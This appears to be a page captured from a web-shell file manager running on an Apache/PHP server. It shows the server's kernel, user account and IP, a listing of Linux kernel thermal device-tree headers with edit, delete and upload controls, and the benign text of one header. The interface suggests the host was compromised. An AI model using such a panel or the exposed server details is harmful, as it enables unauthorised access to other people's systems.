[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
dt-bindings
/
thermal
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 lm90.h
297 B
SET
[ EDIT ]
|
[ DEL ]
📄 tegra124-soctherm.h
592 B
SET
[ EDIT ]
|
[ DEL ]
📄 tegra186-bpmp-thermal.h
404 B
SET
[ EDIT ]
|
[ DEL ]
📄 thermal.h
342 B
SET
[ EDIT ]
|
[ DEL ]
📄 thermal_exynos.h
939 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: thermal_exynos.h
/* * thermal_exynos.h - Samsung EXYNOS TMU device tree definitions * * Copyright (C) 2014 Samsung Electronics * Lukasz Majewski <l.majewski@samsung.com> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * */ #ifndef _EXYNOS_THERMAL_TMU_DT_H #define _EXYNOS_THERMAL_TMU_DT_H #define TYPE_ONE_POINT_TRIMMING 0 #define TYPE_ONE_POINT_TRIMMING_25 1 #define TYPE_ONE_POINT_TRIMMING_85 2 #define TYPE_TWO_POINT_TRIMMING 3 #define TYPE_NONE 4 #endif /* _EXYNOS_THERMAL_TMU_DT_H */